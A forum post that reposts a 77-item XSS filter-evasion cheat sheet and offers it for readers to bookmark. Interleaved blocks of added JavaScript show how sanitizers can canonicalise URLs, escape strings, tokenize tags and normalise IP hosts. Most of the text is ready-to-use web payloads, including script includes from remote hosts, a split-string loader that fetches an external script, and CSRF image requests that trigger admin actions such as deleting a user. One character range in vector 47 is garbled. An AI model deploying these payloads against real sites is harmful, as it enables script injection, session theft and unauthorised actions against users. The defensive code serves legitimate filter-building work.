It seems t00ls has relatively little material on XSS; I saw something good and copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a javascript: directive (javascript: in an IMG SRC only executed in old engines such as IE 6; it remains the standard test case for encoding filters, because the same decoding applies to HREF and IFRAME SRC, which still execute)
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (XSS calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode (decimal entity) encoding (XSS calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit (unpadded) UTF-8 decimal encoding, no semicolons (XSS calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex entity encoding, also without semicolons (XSS calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the javascript: directive (a literal TAB between "jav" and "ascript")
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, one character per line; an extreme XSS example
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

(16) Working around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2 (null bytes are basically useless domestically, because there is nowhere to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: in an IMG SRC
<IMG SRC=" &#14;  javascript:alert('XSS');">
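Vectors (3) to (19) all reduce to the same javascript: URL once the attribute value is decoded and whitespace-stripped the way a browser does it, which is why a filter that matches the raw string misses them. The following is an added example, not part of the original post, that performs that canonicalisation as a filter check in JavaScript under Node; the function names are my own and the sample attribute values are taken from the vectors above.

```javascript
// Added example (not from the original post): canonicalise an attribute value
// the way a browser does before it decides the URL's scheme, so that the
// encoded, case-mangled and whitespace-split javascript: payloads all collapse
// to the same thing.  No external libraries; runs under Node.

// Named character references that matter for URL smuggling (a subset, not a
// full entity table; these require the trailing semicolon in HTML5).
const NAMED_REFS = { Tab: '\t', NewLine: '\n', colon: ':', lpar: '(', rpar: ')' };

// Decode numeric character references (with or without the semicolon, with
// zero padding) and the named ones above, as the attribute-value tokenizer
// does.  NUL and out-of-range code points become U+FFFD.
function decodeCharRefs(s) {
  return s.replace(/&#x([0-9a-f]+);?|&#([0-9]+);?|&([A-Za-z]+);/gi, (m, hex, dec, name) => {
    if (name !== undefined) return name in NAMED_REFS ? NAMED_REFS[name] : m;
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp === 0 || cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
  });
}

// Extract the scheme as the WHATWG URL parser sees it: strip leading and
// trailing C0 controls and spaces, drop every tab and newline anywhere, then
// read the scheme up to the first colon.  Returns null when there is none.
function urlScheme(attrValue) {
  const s = decodeCharRefs(attrValue)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// Policy check a sanitizer should apply to SRC/HREF/ACTION values: any
// script-capable scheme is rejected, and so is a value that still carries a
// control character after decoding, since the legacy engines targeted by the
// null-byte vectors above silently skipped those.
const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript', 'data']);
function isScriptableUrl(attrValue) {
  const decoded = decodeCharRefs(attrValue);
  if (/[\u0000-\u0008\u000b\u000c\u000e-\u001f]/.test(decoded)) return true;
  return SCRIPT_SCHEMES.has(urlScheme(attrValue));
}

// Constructed inputs: attribute values from the vectors above.
const URL_SAMPLES = [
  "JaVaScRiPt:alert('XSS')",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
  "jav&#x09;ascript:alert('XSS');",
  "jav\tascript:alert('XSS');",
  " &#14;  javascript:alert('XSS');",
  "java\u0000script:alert('XSS')",
  "http://3w.org/XSS/xss.js",
];
for (const v of URL_SAMPLES) {
  console.log(JSON.stringify(v), '->', urlScheme(v), isScriptableUrl(v) ? 'REJECT' : 'ok');
}
```

The NUL case is worth noting: per current URL parsing `java\0script:` has no scheme at all (it would be treated as a relative URL), so a scheme-only check returns null; the control-character rule is what rejects it.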
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2, with a protocol-relative URL
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons (the regex literal's source is the string)
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes (for a template that backslash-escapes quotes but not backslashes)
\";alert('XSS');//
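Vector (29) targets a server-side template that writes user input into a JavaScript string literal and escapes only the double quote. The following is an added example, not from the original post: the vulnerable escaper beside a hardened one, run under Node with alert() replaced by a recorder so the outcome can be observed. naiveEscape, safeEscape and the render helpers are hypothetical names.

```javascript
// Added example (not from the original post): the "escaping JavaScript
// escapes" vector against a template that emits  var a = "<user input>";
// alert() is replaced by a recorder so we can see whether the payload ran.
// Runs under Node.

const fired = [];
globalThis.alert = (msg) => fired.push(msg);   // stand-in for the browser's alert()

// Vulnerable escaper: backslash-escapes double quotes but not backslashes,
// so an input beginning with \" becomes \\" and the quote closes the literal.
function naiveEscape(s) {
  return s.replace(/"/g, '\\"');
}

// Hardened escaper: JSON.stringify escapes both " and \; < and the
// U+2028/U+2029 line separators are escaped as well so the literal is safe
// inside an inline <script> block as well as in a .js response.
function safeEscape(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The two ways the template could build the script source.
function renderNaive(userInput) { return `var a = "${naiveEscape(userInput)}"; return a;`; }
function renderSafe(userInput)  { return `var a = ${safeEscape(userInput)}; return a;`; }

// Execute generated source as the browser would; report the value of a and
// everything alert() saw while it ran.
function run(source) {
  fired.length = 0;
  const value = new Function(source)();
  return { value, alerts: fired.slice() };
}

// Constructed input: vector (29) from the list above.
const ESCAPE_PAYLOAD = '\\";alert(\'XSS\');//';
console.log('naive:', renderNaive(ESCAPE_PAYLOAD), '=>', run(renderNaive(ESCAPE_PAYLOAD)));
console.log('safe :', renderSafe(ESCAPE_PAYLOAD), '=>', run(renderSafe(ESCAPE_PAYLOAD)));
```

With the naive escaper the generated source is `var a = "\\";alert('XSS');//"; return a;`: the literal ends after the escaped backslash, the alert runs, and the rest of the line is commented out. The hardened version round-trips the input as data.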
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) VBScript in an IMG
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with a leading URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters before the directive (any of decimal 1-32, 34, 39, 160, 8192-8013, 12288 and 65279 are accepted)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression broken up by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything that begins with an open angle bracket and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE tag using background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (a hybrid of the STYLE vectors above; it shows how hard STYLE is to parse)
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

(53) STYLE tag using background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash movie that carries the XSS (AllowScriptAccess="always" lets the movie script the hosting page cross-origin)
<EMBED SRC="http://3w.org/XSS/xss.swf" AllowScriptAccess="always"></EMBED>

(56) Using ActionScript inside the Flash movie you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered you can put the JS code in a file with an image extension and include it
<SCRIPT SRC="http://3w.org/XSS/xss.jpg"></SCRIPT>

(59) IMG embedded command: the image request is a GET that carries the victim's cookies, so it triggers any GET-driven action the victim is permitted to perform (this is CSRF rather than script execution)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command 2 (a.jpg lives on the attacker's server, which answers with this Apache Redirect so the victim's browser follows it to the admin action)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing filters with HTML quote encapsulation
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
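Vectors (61) to (66) work against filters that treat the first > as the end of the tag, while the browser's tokenizer respects quoted attribute values. The following is an added example, not from the original post: a start-tag parser that follows the HTML tokenizer's attribute states, beside a regex-style filter, run over those six vectors under Node. Following the tokenizer rules, (62) and (65) close at the first > in a standards browser (a backtick is not a quote character in HTML; those two relied on old IE), so the example reports them as not loading the remote script. (67) assembles the tag with document.write at runtime and is invisible to any static filter. parseStartTag, naiveStartTag and loadsRemoteScript are my own names.

```javascript
// Added example (not from the original post): a start-tag parser that follows
// the HTML tokenizer's attribute states, beside the regex-style view that ends
// the tag at the first '>'.  Shows which of vectors (61)-(66) a standards
// browser actually turns into <script src=...>.  Runs under Node, no deps.

const WS = /[\t\n\f\r ]/;

// Parse the start tag at html[pos] (which must be '<').  Returns the
// lower-cased tag name, the attribute map (first occurrence wins, as in
// browsers) and the offset just past the closing '>'; null if it never closes.
function parseStartTag(html, pos = 0) {
  let i = pos + 1, name = '';
  while (i < html.length && /[A-Za-z0-9]/.test(html[i])) name += html[i++].toLowerCase();
  const attrs = {};
  let state = 'beforeName', attrName = '', attrValue = '';
  const commit = () => {
    if (attrName !== '' && !(attrName in attrs)) attrs[attrName] = attrValue;
    attrName = ''; attrValue = '';
  };
  const done = (end) => { commit(); return { name, attrs, end }; };
  for (; i < html.length; i++) {
    const c = html[i];
    switch (state) {
      case 'beforeName':           // '=', quotes and '<' are parse errors here,
        if (WS.test(c) || c === '/') break;   // but they still begin an attribute name
        if (c === '>') return done(i + 1);
        attrName = c.toLowerCase(); state = 'name'; break;
      case 'name':                 // quotes and '<' are appended to the name
        if (WS.test(c)) { state = 'afterName'; break; }
        if (c === '=') { state = 'beforeValue'; break; }
        if (c === '>') return done(i + 1);
        if (c === '/') { commit(); state = 'beforeName'; break; }
        attrName += c.toLowerCase(); break;
      case 'afterName':
        if (WS.test(c)) break;
        if (c === '=') { state = 'beforeValue'; break; }
        if (c === '>') return done(i + 1);
        if (c === '/') { commit(); state = 'beforeName'; break; }
        commit(); attrName = c.toLowerCase(); state = 'name'; break;
      case 'beforeValue':          // only " and ' open a quoted value; ` does not
        if (WS.test(c)) break;
        if (c === '"') { state = 'dq'; break; }
        if (c === "'") { state = 'sq'; break; }
        if (c === '>') return done(i + 1);
        state = 'unquoted'; i--; break;                   // reconsume as unquoted
      case 'dq':
        if (c === '"') { commit(); state = 'afterQuoted'; break; }
        attrValue += c; break;
      case 'sq':
        if (c === "'") { commit(); state = 'afterQuoted'; break; }
        attrValue += c; break;
      case 'unquoted':             // '>' ends the tag even inside the value
        if (WS.test(c)) { commit(); state = 'beforeName'; break; }
        if (c === '>') return done(i + 1);
        attrValue += c; break;
      case 'afterQuoted':          // missing whitespace: reconsume in beforeName
        if (c === '>') return done(i + 1);
        state = 'beforeName'; if (!WS.test(c) && c !== '/') i--; break;
    }
  }
  return null;
}

// Regex-style filter view: the tag ends at the first '>' and the attributes
// are whatever name=value pairs appear before it.
function naiveStartTag(html, pos = 0) {
  const end = html.indexOf('>', pos);
  if (end < 0) return null;
  const inside = html.slice(pos + 1, end);
  const attrs = {};
  for (const m of inside.matchAll(/([^\s=]+)=("[^"]*"|'[^']*'|[^\s>]*)/g)) {
    attrs[m[1].toLowerCase()] = m[2].replace(/^["']|["']$/g, '');
  }
  return { name: inside.split(/\s+/)[0].toLowerCase(), attrs, end: end + 1 };
}

// Would this parser see a <script> element with a remote src?
function loadsRemoteScript(parser, html) {
  const tag = parser(html);
  return tag !== null && tag.name === 'script' && 'src' in tag.attrs;
}

// Constructed inputs: vectors (61)-(66) above, in order.
const QUOTE_VECTORS = [
  '<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>',
  '<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>',
  '<SCRIPT a=">" \'\' SRC="http://3w.org/xss.js"></SCRIPT>',
  '<SCRIPT "a=\'>\'" SRC="http://3w.org/xss.js"></SCRIPT>',
  '<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>',
  '<SCRIPT a=">\'>" SRC="http://3w.org/xss.js"></SCRIPT>',
];

for (const v of QUOTE_VECTORS) {
  console.log(v, '\n  browser:', loadsRemoteScript(parseStartTag, v),
              ' naive filter:', loadsRemoteScript(naiveStartTag, v));
}
```

The practical lesson is that a filter has to tokenize the markup with the same rules as the browser; any shortcut that finds tag boundaries with a regex produces a parse differential the attacker can sit in.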
(68) URL evasion: IP address instead of hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding of the host
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) Dword (decimal) IP (3232235521 is 192.168.0.1)
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding (the embedded newline and tabs are discarded by the URL parser; the host resolves to 66.102.7.147)
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>

(74) Dropping "http:" (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>

(75) Dropping "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
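Vectors (68) to (76) are all spellings of the same kind of host, and a URL allow-list that compares the raw string is bypassed by every one of them. The following is an added example, not from the original post: the WHATWG URL IPv4 number parsing rules (hex, octal, decimal, fewer than four parts, tabs and newlines removed first) implemented in JavaScript under Node so a host can be compared in canonical form. canonicalIPv4 and hostIs are my own names. In Node and modern browsers new URL(...).hostname performs the same normalisation; percent-decoding of the host (69) and IDNA are separate steps that run before this one.

```javascript
// Added example (not from the original post): normalise the host spellings in
// vectors (68)-(73) to a canonical dotted quad, following the WHATWG URL IPv4
// parser.  An allow/deny list that compares raw strings instead of this form
// is bypassed by any of those spellings.  Runs under Node, no dependencies.

// One dotted-quad part: a "0x"/"0X" prefix is hex, a leading "0" is octal,
// anything else is decimal.  Returns null if the part is not a number.
function parseIPv4Part(part) {
  if (part === '') return null;                          // "1..2" is not an address
  let radix = 10;
  if (/^0x/i.test(part)) { part = part.slice(2); radix = 16; }
  else if (part.length > 1 && part[0] === '0') { part = part.slice(1); radix = 8; }
  if (part === '') return 0;                             // "0x" on its own is zero
  const digits = { 8: /^[0-7]+$/, 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i }[radix];
  return digits.test(part) ? parseInt(part, radix) : null;
}

// Canonical "a.b.c.d" for any IPv4 literal a browser accepts, or null when the
// host is a domain name or an invalid literal.  Tabs and newlines are removed
// first, as the URL parser does before host parsing; a trailing dot is allowed.
function canonicalIPv4(host) {
  const parts = host.replace(/[\t\n\r]/g, '').split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();
  if (parts.length > 4) return null;
  const nums = parts.map(parseIPv4Part);
  if (nums.some((n) => n === null)) return null;
  const head = nums.slice(0, -1), last = nums[nums.length - 1];
  // every part but the last is one octet; the last part fills the remaining bytes
  if (head.some((n) => n > 255)) return null;
  if (last >= 256 ** (5 - nums.length)) return null;
  let addr = last;
  head.forEach((n, i) => { addr += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map((sh) => Math.floor(addr / 2 ** sh) % 256).join('.');
}

// The comparison a URL allow-list should make: canonical form against
// canonical form, never raw string against raw string.
function hostIs(host, expectedDottedQuad) {
  return canonicalIPv4(host) === expectedDottedQuad;
}

// Constructed inputs: hosts from vectors (68)-(76) above plus two extra forms.
const HOST_SAMPLES = ['127.0.0.1', '3232235521', '0xc0.0xa8.0x00.0x01', '0300.0250.0000.0001',
  '6\t6.000146.0x7.147', '0x7f.1', '2130706433', 'www.google.com.', '1.2.3.4.5'];
for (const h of HOST_SAMPLES) console.log(JSON.stringify(h), '->', canonicalIPv4(h));
```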